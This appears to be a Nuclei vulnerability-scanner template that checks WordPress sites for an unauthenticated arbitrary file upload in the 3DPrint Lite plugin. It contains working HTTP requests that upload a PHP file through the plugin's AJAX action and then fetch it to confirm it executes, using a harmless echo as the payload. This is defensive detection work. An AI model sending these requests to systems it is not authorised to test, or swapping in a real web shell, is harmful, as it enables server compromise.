id: 3dprint-arbitrary-file-upload

info:
  name: 3DPrint Lite < 1.9.1.5 - Unauthenticated Arbitrary File Upload
  author: SecTheBit
  severity: high
  description: |
    The p3dlite_handle_upload AJAX action of the plugin does not have any authorisation and does not check the uploaded file, allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
  reference:
    - https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282
    - https://www.exploit-db.com/exploits/50321
  metadata:
    verified: true
  tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint

requests:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353

        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="action"

        p3dlite_handle_upload
        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="file"; filename={{randstr}}.php
        Content-Type: text/php

        <?php echo '3DPrint-arbitrary-file-upload'; ?>
        -----------------------------54331109111293931601238262353--

      - |
        GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(all_headers_2, "text/html")'
          - "status_code_2 == 200"
          - "contains(body_2, '3DPrint-arbitrary-file-upload')"
        condition: and